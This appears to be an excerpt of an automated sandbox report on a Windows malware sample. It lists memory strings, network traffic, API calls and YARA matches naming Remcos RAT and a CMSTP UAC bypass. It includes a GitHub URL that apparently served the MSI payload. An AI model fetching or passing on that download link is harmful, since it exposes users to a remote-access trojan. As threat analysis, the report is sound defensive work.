                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp, MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp, MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://t2.symcb.com0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://tl.symcd.com0&
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.0000000002363000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.0000000005223000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.000000000233D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.0000000002536000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.00000000022E9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.00000000023AF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BB2000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.0000000002488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                      Source: Updwork.exe, Updwork.exe, 00000007.00000000.2277568038.0000000000438000.00000002.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000000.2588325124.0000000000438000.00000002.00000001.01000000.0000000D.sdmp, Updwork.exe.3.drString found in binary or memory: http://www.zlib.net/
                      Source: Updwork.exe, 00000007.00000002.2473047900.000000000040A000.00000004.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000002.2766160302.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, zlib1.dll.7.drString found in binary or memory: http://www.zlib.net/D
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                      Source: wscript.exe, 00000000.00000002.2180487920.000001BE6E1E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180154871.000001BE6E1E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Kroby5444/
                      Source: wscript.exe, 00000000.00000002.2180621569.000001BE6E5A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.ms
                      Source: wscript.exe, 00000000.00000003.2180076930.000001BE6E201000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180205297.000001BE6E1DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi
                      Source: ~DF3A55DD39FD7B01DD.TMP.3.dr, inprogressinstallinfo.ipi.3.dr, ~DF3C7138185BD29209.TMP.3.dr, ~DFF5932D2E29931496.TMP.3.dr, ~DFEAD6EDEC35001CF3.TMP.3.dr, ~DFD62908AF9B4414CC.TMP.3.drString found in binary or memory: https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi0
                      Source: ~DF5F00B5FE69ED3BD9.TMP.3.drString found in binary or memory: https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi1630105376311466440
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: https://www.advancedinstaller.com
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: https://www.thawte.com/cps0/
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: https://www.thawte.com/repository0W
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49709 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_00405205
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_20433600 GetFocus,#2366,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetFocus,#2366,GetParent,#2366,#2648,SendMessageW,InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,#5210,6_2_20433600

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED

                      System Summary

                      barindex
                      Source: 8.2.cmd.exe.33007f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.cmd.exe.3302800.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 29.2.EHttpSrv.exe.242d2e4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.cmd.exe.4c22f90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 29.2.EHttpSrv.exe.240ba18.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.4b6f6c4.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 15.2.EHttpSrv.exe.23bbee4.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 15.2.EHttpSrv.exe.23bb2e4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 23.2.EHttpSrv.exe.25a7b90.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 16.2.cmd.exe.5015f90.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
